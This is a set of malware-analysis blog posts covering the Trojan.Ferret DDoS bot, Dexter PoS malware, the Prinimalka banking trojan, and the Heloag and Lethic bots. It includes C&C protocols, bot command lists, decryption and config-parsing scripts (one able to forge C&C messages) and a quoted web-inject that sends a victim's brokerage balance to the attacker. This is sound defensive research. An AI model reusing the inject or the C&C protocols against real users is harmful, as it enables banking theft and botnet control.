A Business of Ferrets

By: Dennis Schwarz -

Trojan.Ferret appeared on my radar thanks to a tweet by @malpush. The tweet revealed a URL that at the time of this writing was pointing to a command and control (C&C) panel that looked like this:


The logo alone convinced me to study this business of ferrets further. Coincidentally (for Arbor), it turns out that this malware is a DDoS bot.

Malware Sample

The sample analyzed can be found at malwr (MD5: 4fa91b76294d849d01655ffb72b30981).

It is written in Delphi and plays the following malware games: UPX packing, string obfuscation, anti-virtual machine, anti-debugging, self-modifying code, and process hollowing.

Based on the Delphi usage and the language used for part of the panel, this bot is likely of Russian origin.


Trojan.Ferret uses two methods of obfuscation; both are a combination of base64 and XOR. Different keys are used for various sections. The first obfuscation method is used mostly for strings and can be decrypted with the following Python function:

import base64

def decrypt_strings(msg, key):
  # Base64-decode, then for every byte XOR the low nibble with the low
  # nibble of the (cycled) key byte and with the constant 0xa. The high
  # nibble of the ciphertext byte is kept as-is. Python 3: the key is a
  # str and is encoded to bytes so the XOR works on ints.
  msg_no_b64 = base64.b64decode(msg)
  key = key.encode("latin-1")

  plain_buf = []
  for i in range(len(msg_no_b64)):
    key_lsb = key[i % len(key)] & 0xf
    msg_lsb = msg_no_b64[i] & 0xf

    c = msg_lsb ^ key_lsb
    d = c ^ 0xa

    msg_slsb = msg_no_b64[i] & 0xf0
    plain_byte = msg_slsb ^ d
    plain_buf.append(chr(plain_byte))

  return "".join(plain_buf)

Here are some examples:

>>> decrypt_strings("QG1wZ2xnPj4sZGNk", "12xc3qwfhjeryTTYHH")

>>> decrypt_strings("TG12RGZveGBnSG5mZ2JrQg==", "12xc3qwfhjeryTTYHH")

>>> decrypt_strings("dWpkbXFqZmxi", "mu#X")

>>> decrypt_strings("cn9tY3Nqf2d1", "mu#X")

>>> decrypt_strings("ZXN8djotITgyOyQ0MD4mOD45Jzc5I2NmfS1kaXhzdCx+YXo=", "GMrlZ8t3pypO3423423LpFqCUx")

The second method is used mostly for C&C communications and can be cleaned up with the following Python function:

import base64

def decrypt_cnc(msg, key):
  # Base64-decode, then XOR every byte with the repeating key. For the
  # analyzed sample the key is the single byte 0x38.
  msg_no_b64 = base64.b64decode(msg)
  key = key.encode("latin-1")

  plain_buf = []
  for offset, enc_byte in enumerate(msg_no_b64):
    plain_byte = enc_byte ^ key[offset % len(key)]
    plain_buf.append(chr(plain_byte))

  return "".join(plain_buf)

Here are some examples:

>>> decrypt_cnc("ChYJCRhta3k=", "\x38")
'2.11 USA'

>>> decrypt_cnc("DRhAAA4YeRgIXBgIUBgPVRgKAEs=", "\x38")
'5 x86 A 0d 0h 7m 28s'

Command and Control

C&C is HTTP based. Two message types have been identified. The first is message type 0 or the “phone home” and looks like:

POST /hor/input.php HTTP/1.0
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://mhome.br
Content-Length: 106
Content-Type: application/x-www-form-urlencoded


Here’s what it looks like decrypted:

m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h 7m 28s

Its POST parameters are:

  • m – Message type (0)
  • h – Hash based on computer name
  • p – Computer name
  • v – Version and locale
  • s – Windows version, architecture, user type, and uptime

The phone home response looks like:

HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 14:48:27 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8


Decrypted, it is the User-Agent used in the request:

>>> decrypt_cnc("dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN", "\x38")
'Mozilla Gecko Firefox 25'

The second message type is 1 or “poll for commands”. It looks like:

POST /hor/input.php HTTP/1.0
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://udot.tk
Content-Length: 49
Content-Type: application/x-www-form-urlencoded


And here it is decrypted:


Its POST parameters are:

  • m – Message type (1)
  • h – Hash based on computer name

An example poll response is:

HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 12:56:16 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 72
Connection: close
Content-Type: text/html; charset=UTF-8



>>> decrypt_cnc("UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=", "\x38")

Commands are delimited by “*”s and are formatted like:



The following bot commands have been identified:

  • httpflood – HTTP GET flood
  • httppost – HTTP POST flood
  • udpflood – UDP flood
  • synflood – TCP connect flood
  • tcpflood – TCP flood
  • download – download and execute (all bots)
  • downloadone – download and execute (specified bot)
  • update – update (all bots)
  • updateos – update (specified OS)
  • updateone – update (specified bot)
  • updatever – update (specified version)
  • removeos – remove bot (specified OS)
  • removeone – remove bot (specified bot)
  • s! – stop all floods
  • su – stop UDP flood
  • sh – stop HTTP flood
  • ss – stop TCP SYN flood
  • st – stop TCP flood
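As an added example (not code from the original post), the following Python 3 script ties the two decryption routines to the C&C messages described above: it decrypts a message body with the C&C scheme (key byte 0x38 for this sample), splits a decrypted phone-home body into its POST parameters, and splits a decrypted poll response on “*” into the command name and its parameters, checking the name against the command list. The sample inputs are the base64 strings quoted in this post; the meaning of the fields after the command name is not documented here, so they are returned as a plain list. The encrypt_cnc helper is an addition that uses the fact that XOR is its own inverse.

```python
import base64
from urllib.parse import parse_qsl

# Bot commands listed in this post; anything else is reported as unknown.
KNOWN_COMMANDS = {
    "httpflood", "httppost", "udpflood", "synflood", "tcpflood",
    "download", "downloadone", "update", "updateos", "updateone",
    "updatever", "removeos", "removeone", "s!", "su", "sh", "ss", "st",
}

# C&C key observed in this sample: the single byte 0x38.
CNC_KEY = "\x38"


def decrypt_strings(msg, key):
    """String-table scheme: base64, then for each byte XOR the low nibble
    with the low nibble of the cycled key byte and with 0xa; the high
    nibble of the ciphertext byte is kept as-is."""
    data = base64.b64decode(msg)
    kb = key.encode("latin-1")
    out = bytearray()
    for i, c in enumerate(data):
        low = (c & 0x0F) ^ (kb[i % len(kb)] & 0x0F) ^ 0x0A
        out.append((c & 0xF0) | low)
    return out.decode("latin-1")


def decrypt_cnc(msg, key=CNC_KEY):
    """C&C scheme: base64, then repeating-key XOR."""
    data = base64.b64decode(msg)
    kb = key.encode("latin-1")
    return bytes(c ^ kb[i % len(kb)] for i, c in enumerate(data)).decode("latin-1")


def encrypt_cnc(plaintext, key=CNC_KEY):
    """XOR is its own inverse, so encoding is the same XOR followed by
    base64; handy for building test vectors or a fake C&C response."""
    kb = key.encode("latin-1")
    raw = plaintext.encode("latin-1")
    enc = bytes(c ^ kb[i % len(kb)] for i, c in enumerate(raw))
    return base64.b64encode(enc).decode("ascii")


def parse_phone_home(plaintext):
    """Split a decrypted message-type-0 body into its POST parameters."""
    return dict(parse_qsl(plaintext, keep_blank_values=True))


def parse_command(plaintext):
    """Split a decrypted poll response on '*'. The first field is the
    command name; the remaining fields are its parameters, whose meaning
    is not documented here, so they are returned as a plain list."""
    fields = plaintext.split("*")
    name, params = fields[0], fields[1:]
    return name, params, name in KNOWN_COMMANDS


if __name__ == "__main__":
    # Samples are the base64 strings quoted in this post.
    print(decrypt_strings("QG1wZ2xnPj4sZGNk", "12xc3qwfhjeryTTYHH"))  # Kernel32.dll
    print(parse_phone_home("m=0&h=18803769021711750776216376939&p=HOME"
                           "&v=2.11 USA&s=5 x86 A 0d 0h 7m 28s"))
    print(parse_command(decrypt_cnc(
        "UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=")))
```

Run stand-alone it prints a decoded string-table entry (an imported API name), the phone-home parameters as a dict, and the poll response split into the command name and its parameters. Because the C&C scheme is symmetric, encrypt_cnc fed with a known plaintext regenerates the exact base64 a sample sends, which is a cheap way to confirm the key against a capture.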

More information about each command can be found in the “Task Management” section of the C&C panel:



Note: I didn’t see any references to the “memexec” or “script” commands in the analyzed binary.

C&C Panel

Wrapping up, here is a behind the scenes tour of the C&C panel; the “Statistic/Index” page:


Here is the “Uploads” page:


And, part of the “Bot List” page:



This post has analyzed the crypto, C&C infrastructure, and command set of Trojan.Ferret—a new DDoS bot that is likely of Russian origin.  At the time of this writing only a handful of unique samples and C&C servers have been identified, so the scope and impact of the new threat is still uncertain. ASERT will continue to track this business of ferrets, and any other new businesses that arise.

Happy Holidays: Point of Sale Malware Campaigns Targeting Credit and Debit Cards

By: cwilson -

Inside Recent Point-of-Sale Malware Campaign Activities

Curt Wilson, Dave Loftus, Matt Bing

An active Point of Sale (PoS) compromise campaign designed to steal credit and debit card data using the Dexter and Project Hook malware has been detected. Indicators of compromise will be provided for mitigation and detection purposes. Prior to the publication of this Threat Intelligence document (embedded at the end of this post), members of the FS-ISAC, major Credit Card vendors and law enforcement were notified.

It appears that there are at least three distinct versions of Dexter:

  1. Stardust (looks to be an older version, perhaps version 1)
  2. Millenium (note spelling)
  3. Revelation (two observed malware samples; has the capability to use FTP to exfiltrate data)

In early November 2013, ASERT researchers discovered two servers hosting Dexter and other PoS malware, including Project Hook. The Dexter campaign looks more active, especially in the Eastern Hemisphere, and is therefore the main focus here. Dexter, first documented by Seculert in December 2012, is Windows-based malware used to steal credit card data from PoS systems. The exact method of compromise is not currently known; however, PoS systems suffer from the same security challenges as any other Windows-based deployment. Network and host-based vulnerabilities (such as default or weak credentials accessible over Remote Desktop, and open wireless networks that include a PoS machine), misuse, social engineering and physical access are likely infection vectors. Additionally, the potential brittleness and obvious criticality of PoS systems may be a factor in the reportedly slow patch deployment process on PoS machines, which increases risk. Smaller businesses are likely an easier target due to weaker security. While the attackers may receive less card data from smaller retailers, infections may be more numerous and last longer due to the lack of security reporting and security staff in such environments.

Figure 1: Dexter (Purple) and Project Hook (Orange) infections in the Eastern Hemisphere


Figure 2: Dexter (Purple) and Project Hook (Orange) infections in the western hemisphere


For the full document, including a list of compromise indicators and information about the back-end infrastructure, please download the full public report:

Dexter and Project Hook Break the Bank


Trojan.Prinimalka: Bits and Pieces

By: Dennis Schwarz -

Trojan.Prinimalka is a banking trojan associated with an attack campaign that received quite a bit of press in October 2012. “Project Blitzkrieg” is “a new cybecriminal [sic] project aimed at recruiting 100 botmasters to help launch a series of lucrative online heists targeting 30 U.S. banks.” The Trojan installs a proxy on the victim host and then sends system/web browser details back to the C&C. The botmasters can use this setup to “spoof” banking requests as the unsuspecting banking user.

Trojan.Prinimalka is based on Gozi and shares quite a few similarities. There are at least 2 variants in the wild: “nah” and “gov”. This analysis focuses on the “gov” version. Static analysis was performed on a memory dump of a sample (MD5: 2bdb44e5e3bbcebf3f0ceb156a407794). It was supplemented with some dynamic analysis using C&Cs located at 193.xxx.92.xxx (as of writing, still live) and

Registry Persistence
A value named “govShell” is created under the “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” key. It stores “%UserProfile%\govXXXX.exe” (the “X”s are random lowercase letters). This is a standard registry persistence technique where the program will run on user login.

A mutex named “sdfsdfsdfsdfsfsdfsdfsdfsdfsdf” is created.

Dropped Files

  • %UserProfile%\govXXXX.exe (the “X”s are random lowercase letters)
  • %UserProfile%\govtemp1.exe
  • %UserProfile%\govold.exe
  • %UserProfile%\govcookies.txt
  • %CD%\govcookies.dat

Registry Configuration
Under the “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion” key, various configuration values with a “gov” prefix are maintained.

Registry value, description, and sample value:

  • govid – Randomly generated 10 digit identifier. Sample: 33520xxxxx
  • govoptions – Obfuscated configuration file. Sample: NEWOPTS<obfuscated data>
  • govopt_server1 – Primary C&C address
  • govopt_reserv – Secondary C&C address
  • govopt_forms – Relative C&C URL to POST system/web browser cloning info to. Sample: /system/prinimalka.py/forms
  • govopt_options – Relative C&C URL to GET configuration data. Sample: /system/prinimalka.py/options
  • govopt_command – Relative C&C URL to GET command data. Sample: /system/prinimalka.py/command
  • govopt_file – Relative C&C URL for unknown data (looks unused in this sample). Sample: /system/prinimalka.py/cookies
  • govopt_ss – Relative C&C URL for unknown data (looks unused in this sample). Sample: /cgi-bin/trash.py
  • govopt_pstorage – Relative C&C URL for unknown data (looks unused in this sample). Sample: /cgi-bin/trash.py
  • govopt_certs – Relative C&C URL for unknown data (looks unused in this sample). Sample: /cgi-bin/trash.py
  • govopt_idproject – Version. Sample: 081003
  • govopt_pauseopt – Poll time. Sample: 3200
  • govcontrol_crc – CRC. Sample: 34661b26
  • govbalance – Controls reverse connection to C&C. Sample: Ok

A “cmd.exe” bindshell is bound to a random port. The bindshell is used in conjunction with the Type 2 “TELN” command.

A basic proxy is bound to a random port, the bindshell’s random port minus 1. The proxy is used in conjunction with the Type 2 “SCKS” command. RSA indicates that the C&C backend has the ability to make web requests to banking websites via the infected host.

C&C Command Channel, Type 1
A Type 1 command request looks like this.

GET /system/prinimalka.py/command?user_id=33520xxxxx&version_id=022201&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host:

The returned command grammar has the following format (one command per line, CRLF terminated).

command1 <parameter>\r\n
command2 <parameter>\r\n
...
commandN <parameter>\r\n

An example response:

HTTP/1.1 200 OK
Date: Wed, 17 Oct 2012 13:00:02 GMT
Server: Apache/2.2.22 (Fedora)
Content-Length: 39
Connection: close
Content-Type: text/plain; charset=UTF-8

changepause 900

Here are the identified commands.

  • deleteself – Delete binary and registry persistence
  • download – Download to and execute “%UserProfile%\govtemp1.exe”
  • update – Copy current version to “%UserProfile%\govold.exe” and download new version
  • killwin – Overwrite first 4 bytes of “\\.\PHYSICALDRIVE0” then shutdown
  • changeversion – Update “govopt_idproject” registry value
  • changehost – Update “govopt_server1” registry value; primary C&C
  • changereserv – Update “govopt_reserv” registry value; secondary C&C
  • changepause – Update “govopt_pauseopt” registry value
  • enable_backconnect – Set “govbalance” registry value to “ok”. Enables reverse connection to C&C for Type 2 command channel
  • send_cookies – Dump browser cookies via “ExportCookieFile()” into “%UserProfile%\govcookies.txt” then POST to C&C
  • recv_cookies – Download browser cookies from C&C into “%CD%\govcookies.dat” then import them via “ImportCookieFile()”
  • enable_rdp – Doesn’t look to be implemented in this sample

C&C Command Channel, Type 2

The Type 2 command channel is a reverse connection from the victim host back to the C&C. It is enabled by the Type 1 “enable_backconnect” command. There isn’t much of a format, the victim host reads 4 bytes from the socket and checks them against the following identified commands.

  • ping – Respond to C&C with “pong”
  • NEED – Ask C&C for any Type 1 commands
  • RDP0 – Doesn’t look to be implemented in this sample
  • SCKS – Connects to the proxy running on localhost and relays traffic (to bypass NAT/firewall)
  • TELN – Connects to the bindshell running on localhost and relays traffic (to bypass NAT/firewall)

There is an 81 byte obfuscated configuration file stored in the binary. It is copied to the “govoptions” registry value. Using corkami’s aplib compression library, the obfuscation can be cleaned up: the first 8 bytes are a “NEWOPTS” header and the rest is an aplib stream.

>>> import aplib
>>> govoptions = 'NEWOPTS\x001\x01rep_siz\xdb\x87\xac\x04w\xf8b\xa4\x0c@0pzoWtr{\xf9\x0bv}b>cr\x1cpt\x1c \x1b3y\x83w\x0e\x02.go<\xdfl;\xbbc\xb8m*G\x0b\xe0H\xc5\x0eyu\x1bt\x02\x00\x00'
>>> s, length = aplib.decompress(govoptions[8:]).do()
>>> s.split("\x00")
['1rep_size', '1', '1web_size', '0', '1post_size', '0', '1ss_size', '0', '1vbscript', ' ', '3rep', 'www.google.com', 'Google', 'Hooyugle', '', '', '']

Here are the identified configuration verbs.

  • 1rep_size – Number of 3rep sections
  • 1web_size – Number of 4webvalue sections
  • 1post_size – Number of 3postvalue sections
  • 1ss_size – Number of 2ss sections
  • 1vbscript – Currently unknown
  • 3rep – Define a find and replace rule
  • 4webvalue – Looks to be unused in this sample
  • 3postvalue – Looks to be unused in this sample
  • 2ss – Looks to be unused in this sample
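As an added example (not code from the original post), here is a Python 3 parser for the decompressed configuration shown above, together with a function that applies the resulting “3rep” rules the way the browser read hooks described later in this post do. It assumes, from this one sample, that the leading digit of each verb is the number of NUL-separated arguments that follow it (1rep_size takes one, 3rep takes three); that reading is an inference, not something documented for the family. Substring matching of the rule URL against the request URL is likewise an assumption. The input is the decompressed byte string from the aplib output above, re-assembled here as a literal.

```python
# Decompressed config from the post, re-assembled as a NUL-separated literal
# (constructed from the split() output shown above).
SAMPLE_CONFIG = (
    b"1rep_size\x001\x00"
    b"1web_size\x000\x00"
    b"1post_size\x000\x00"
    b"1ss_size\x000\x00"
    b"1vbscript\x00 \x00"
    b"3rep\x00www.google.com\x00Google\x00Hooyugle\x00"
    b"\x00\x00"
)


def parse_config(blob):
    """Walk the NUL-separated config.

    Assumption: the leading digit of a verb is its argument count.
    Returns (settings, rules): settings maps the single-argument verbs
    (sizes, 1vbscript) to their value; rules is a list of
    (url, find, replace) tuples taken from the 3rep sections.
    Raises ValueError if a section is truncated or the 3rep count does
    not match 1rep_size.
    """
    fields = blob.decode("latin-1").split("\x00")
    settings, rules = {}, []
    i = 0
    while i < len(fields):
        verb = fields[i]
        if not verb or not verb[0].isdigit():
            break                       # trailing NUL padding
        argc = int(verb[0])
        args = fields[i + 1:i + 1 + argc]
        if len(args) != argc:
            raise ValueError(f"truncated section {verb!r}")
        if verb == "3rep":
            rules.append(tuple(args))
        else:
            settings[verb] = args[0] if argc == 1 else args
        i += 1 + argc
    expected = int(settings.get("1rep_size", "0"))
    if expected != len(rules):
        raise ValueError(f"1rep_size says {expected} rules, found {len(rules)}")
    return settings, rules


def apply_rules(url, body, rules):
    """Rewrite a fetched page the way the InternetReadFile/PR_Read hooks do:
    for every rule whose URL pattern occurs in the request URL, replace the
    find text with the replace text. Pages for other URLs pass through."""
    for rule_url, find, replace in rules:
        if rule_url in url:
            body = body.replace(find, replace)
    return body


if __name__ == "__main__":
    settings, rules = parse_config(SAMPLE_CONFIG)
    print(settings)
    print(rules)
    print(apply_rules("http://www.google.com/", "<title>Google</title>", rules))
```

The count check against 1rep_size is the sanity test worth keeping when pointing this at a config pulled from another sample: a mismatch means either the argument-count inference is wrong for that verb set or the blob was cut short.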

An updated, obfuscated configuration file can be requested from the C&C like this.

GET /system/prinimalka.py/options?user_id=33520xxxxx&version_id=022201&crc=34661b26&uptime=00:00:00:59&port=5641&ip= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 193.xxx.92.xxx

The “3rep” sections of the configuration file define “find and replace” rules. These are used with the web browser function-hooking feature to secretly add code to banking websites. At the time of writing, 34 bank URLs are being targeted:

  • -investing.schwab.com/trading/start
  • -www.schwab.com
  • bankofamerica.com/accounts-overview/accounts-overview.go
  • chaseonline.chase.com/MyAccounts.aspx
  • client.schwab.com/Accounts/Summary/Summary
  • etrade.com/e/t/accounts/accountscombo
  • fidelity.com/ftgw/fbc/ofsummary/defaultPage
  • ibanking-services.com/cib/CEBMainServlet/AccountOverview
  • investing.schwab.com/secure/schwab/
  • investor.firstrade.com/firstrade/mainmenu.do
  • myaccountsaws.navyfcu.org/nfoaa/main
  • online.citibank.com/US/JPS/portal/Home.do
  • online.wamu.com/Servicing/Servicing.aspx?targetPage=AccountSummary
  • online.wellsfargo.com/das/cgi-bin/session.cgi
  • onlineaccess.ncsecu.org/accounts/balances.aspx
  • onlinebanking.capitalone.com/CapitalOne/Accounts/
  • onlinebanking.huntington.com/Accounts/Accounts.asp
  • onlinebanking.mandtbank.com/summary/AccountSummary.aspx
  • onlinebanking.pnc.com/alservlet/
  • onlinebanking.tdbank.com/accts/getAccts.asp?fname=
  • secure.accurint.com
  • securebank.regions.com/balances/AccountSummary.aspx
  • sharebuilder.com/sharebuilder/Home.aspx
  • suntrust.com/portal/server.pt
  • trading.scottrade.com/home/default.aspx
  • us.hsbc.com/1/2/
  • usaa.com/inet/ent_home/CpHome
  • usbank.com/internetBanking/RequestRouter
  • wachovia.com/MyAccounts.aspx
  • www.53.com/servlet/efsonline/index.html
  • www.americanfunds.com/account/account-summary.htm
  • www.optionsxpress.com/
  • www.paypal.com/us/cgi-bin/webscr
  • wwws.ameritrade.com/cgi-bin/apps/u/Home

A sample find and replace rule looks like this.

>>> config[10]
'3rep'
>>> config[11] # URL
'fidelity.com/ftgw/fbc/ofsummary/defaultPage'
>>> config[12] # Find

>>> for line in config[13].split("\r\n"): # Replace
...     print(line)

<div style="visibility: hidden">
<iframe name="myframe" id="myframe"></iframe>
<form name=xbalance method='POST' action='/robots.txt' target=myframe><input name=balance><input name=from><input name=lastlogin value="0"></form>
</div><script language="JavaScript">
var data = document.body.innerHTML;
var reg = /Portfolio Total:[\d\D]{1,128}(\$[\d,.]+)/gmi;
var arr = reg.exec(data);
if (arr) {
var postdata = arr[1];
var f = document.xbalance;
f.from.value = "fidelity";
f.balance.value = postdata;




As can be seen, code is added to the end of the page to POST balance, bank name, and last login information to “/robots.txt”. The “/robots.txt” is used as a tag, see below.

Process Injection and Function Hooking

The Trojan injects part of itself into all running processes except for those with an image name starting with:

  • svchost.exe
  • [System Process]
  • System
  • smss.exe
  • winlogon.exe
  • lsass.exe
  • avp
  • csrss.exe
  • services.exe

The injected function is responsible for hooking the following functions.

  • kernel32.dll – CreateProcessA, CreateProcessW, FindFirstFileA, FindFirstFileW, FindNextFileA, FindNextFileW
  • advapi32.dll – RegEnumValueA, RegEnumValueW
  • wininet.dll – InternetCloseHandle, InternetQueryDataAvailable, InternetReadFile, InternetReadFileExA, HttpSendRequestA, HttpSendRequestW
  • nspr4.dll – PR_Write, PR_Read, PR_Close

The CreateProcess hooks make sure any new processes are injected.

The FindXFile hooks hide any files that start with “gov”.

The RegEnumValue hooks hide any registry values that start with “gov”.

The InternetReadFile and PR_Read hooks are used to rewrite pieces of returned banking websites based on the “3rep” rules in the configuration file.

The HttpSendRequest and PR_Write functions look for the “/robots.txt” tag introduced by the “3rep” rewrite rules.  They then POST the HTTP request and cookie file to the C&C.

System/Web Browser Cloning

RSA indicates that the C&C backend has the ability to clone a victim’s web browser while sending requests through the victim host’s proxy. The following shows the type of data the trojan gathers for this feature.

POST /system/prinimalka.py/forms HTTP/1.1
Content-Type: multipart/form-data; boundary=————————–15c5175b07b5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host:
Content-Length: 705
Connection: Keep-Alive
Cache-Control: no-cache

Content-Disposition: form-data; name="upload_file"; filename="33520xxxxx.022201"
Content-Type: application/octet-stream

URL: http://service.stat/
priv=USER_PRIV_ADMIN&winver=Microsoft Windows XP Professional Service Pack 3 (Build 2600) 2600.xpsp.080413-2111&resolution=1024x768&UniqueID={0X8X9XFX-FXDX-4X1X-8X6X-7X0X1XDX2XDX}&NTProductId=7X4X7-OEM-2X5X6X2-X4X6X&ProductId=7X4X7-OEM-0X5X1X3-X8X4X&IEProductId=7X4X7-OEM-0X5X1X3-X8X4X&TimeZone=Pacific Standard Time&UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


Arbor Networks at Virus Bulletin 2011

By: jedwards -

Arbor’s ASERT team has a paper at this year’s Virus Bulletin conference in Barcelona, Spain. The paper, by Arbor’s Jeff Edwards and Jose Nazario, is titled A survey of Chinese DDoS malware and is based on some of the detailed analysis we did as part of the development of the ATLAS intelligence feed or AIF. Our malware stream contains a lot of DDoS bots, many from China, one of the more interesting ecosystems of malware development.

The abstract follows:

This paper surveys the diverse landscape of Trojan horse families populating a specific niche in the overall malware ecosystem: botnets that primarily serve as Distributed Denial of Service (DDoS) attack agents and which are believed to be of Chinese origin and/or to be primarily controlled from Chinese IP space.

Approximately two dozen distinct malware families will be described and documented, including the Rincux, NetBot Attacker, IMDDOS, Darkshell and YoyoDDoS families. These families will be characterized in terms of their command and control (CnC) protocols, DDoS attack capabilities, general code architecture, organization of their CnC infrastructure, and preferred targets.

Findings regarding the evolution and sharing/cross-pollination of malcode, as well as the build/release frequency of new versions will be presented. An approximate taxonomy of this particular space of malware will be proposed. The bulk malware analysis infrastructure that was used to obtain these findings will also be briefly described.

The paper is quite in-depth and contains a lot of technical details not covered in the talk, so be sure to refer to the paper if the talk is at all interesting.

Trojan.Heloag Downloader Analysis

By: Jose -

Trojan.Heloag is a Trojan horse designed to manage the installation of other malware on the infected PC. This malcode gives complete control to the attacker and enables them to install arbitrary malcode on the PC. This one appeared in our zoo recently and after reading in an AV writeup about a possible DDoS capability within it, we investigated. Upon detailed inspection, this bot does not appear to have any DDoS capabilities built into it, it appears to only manage downloads on the infected PC.

Many of the samples analyzed were downloaded from 7zsm.com or elwm.net. The malware may download additional files from those domains. We do not know how big this botnet is, but we do see a handful of users in the wild.

Once launched, the malware will install itself in the WINDOWS directory. Names we have observed include:

  • C:\WINDOWS\csrse.exe
  • C:\WINDOWS\ThunderUpdate.exe
  • C:\WINDOWS\conme.exe

The malware then installs a registry key to ensure that it starts when the user logs on:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon = [filename]

Where [filename] refers to the installed filename from above.

It then makes a connection to the C&C server for the botnet, often on TCP port 8090, to register itself and await commands. Traffic is usually preceded by a single byte to indicate the message purpose:

  • 01 – initial hello
  • 02 – keep alive, idle message
  • 03 – download the named file
  • 04 – connect to other peers
  • 05 – send hostname to server
  • 06 – clear
  • 07 – close connection

An initial “HELLO” would therefore look like this:


where HOSTNAME is the Windows name of the computer. We often see a bot connect and get download commands for new EXEs to load onto the PC.

Trojan.Heloag infected hosts often download other malcode over HTTP from a central server, and can also connect to other bots over TCP, often using ports 7000-7010. It’s unclear what the purpose of this is, but it appears to be some form of peer-to-peer

Antivirus uses a handful of aliases for these samples. They aren’t consistent, which isn’t surprising, and the data on this downloader is very thin, as well. AV names we’ve seen include:

  • Microsoft - Backdoor:Win32/Heloag.A
  • Symantec - Suspicious.Insight
  • F-Secure - Suspicious:W32/Malware!Gemini
  • McAfee - Trojan.Crypt.XPACK.Gen
  • Trend Micro - PAK_Generic.001

We are tracking a few dozen of these controllers around the Internet.

Lethic Spambot Analysis: Pills, Watches, and Diplomas

By: Jose -

There’s another spambot afoot, and one of its activities is pharmacy and pill spam. We found it via the malcode in our zoo and C&C traffic that we hadn’t previously characterized. AV coverage of the samples is modest. The botnet appears to be spamming the usual unwanted junk and appears to be medium sized.

Malcode Details

Once launched, the malcode installs itself as:


It then makes the registry changes to ensure it always runs at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "" = C:\WINDOWS\system32\ldfrmmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "" = C:\WINDOWS\system32\ldfrmmd.exe

And it creates a mutex with what appears to be a semi-random name, e.g. adrerdbbbddeil12 (also seen: jjwsmmmwinasllp2, dsdsduehsgser533, etc).

Newer versions appear to try and avoid or kill common analysis tools:

Find Window - Class Name () Window Name (The Wireshark Network Analyzer)
Find Window - Class Name () Window Name (Process Monitor - Sysinternals: www.sysinternals.com)
Find Window - Class Name () Window Name (File Monitor - Sysinternals: www.sysinternals.com)
Find Window - Class Name () Window Name (Registry Monitor - Sysinternals: www.sysinternals.com)

Here’s an example of what appears to be the C&C:

Destination: happymanwoman.cn, TCP port 8900

And the communications data:

$0000 | 00 00 00 00 06 | .....
$0000 | 00 00 00 00 06 | .....
$0000 | 6E 33 0F 00 01 D1 55 D2 54 00 19 | n3....U.T..
$0000 | 6E 33 0F 00 21 01 | n3..!.
$0000 | 6E 33 0F 00 03 4C 00 34 32 31 20 34 2E 34 2E 35 | n3...L.421 4.4.5
$0010 | 20 53 65 72 76 65 72 20 62 75 73 79 2C 20 74 72 | Server busy, tr
$0020 | 79 20 61 67 61 69 6E 20 6C 61 74 65 72 2E 20 28 | y again later. (
$0030 | 6D 78 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 29 20 31 | mx.google.com) 1
$0040 | 36 73 69 31 32 38 37 32 30 33 79 78 65 2E 31 32 | 6si1287203yxe.12
$0050 | 38 0D 0A | 8..
$0000 | 6E 33 0F 00 13 01 | n3....
$0000 | 6E 33 0F 00 02 | n3...
$0010 | 6E 33 0F 00 02 6F 33 0F 00 01 C3 82 84 31 00 19 | n3...o3......1..
$0000 | 6F 33 0F 00 21 01 | o3..!.
$0000 | 70 33 0F 00 01 C3 32 6A 8F 00 19 | p3....2j...
$0000 | 70 33 0F 00 21 01 | p3..!.
$0000 | 6F 33 0F 00 03 38 00 32 32 30 20 6E 61 70 6F 6C | o3...8.220 napol
$0010 | 65 6F 6E 2E 74 65 6C 65 6E 65 74 2D 6F 70 73 2E | eon.telenet-ops.
$0020 | 62 65 20 62 69 7A 73 6D 74 70 20 45 53 4D 54 50 | be bizsmtp ESMTP
$0030 | 20 73 65 72 76 65 72 20 72 65 61 64 79 0D 0A | server ready..
$0000 | 70 33 0F 00 03 39 00 32 32 30 20 6D 74 61 38 33 | p3...9.220 mta83
$0010 | 34 2E 6D 61 69 6C 2E 75 6B 6C 2E 79 61 68 6F 6F | 4.mail.ukl.yahoo
$0020 | 2E 63 6F 6D 20 45 53 4D 54 50 20 59 53 6D 74 70 | .com ESMTP YSmtp
$0030 | 20 73 65 72 76 69 63 65 20 72 65 61 64 79 0D 0A | service ready..

After this C&C communications bit it starts to spam on TCP port 25 using fairly standard SMTP dialogues.
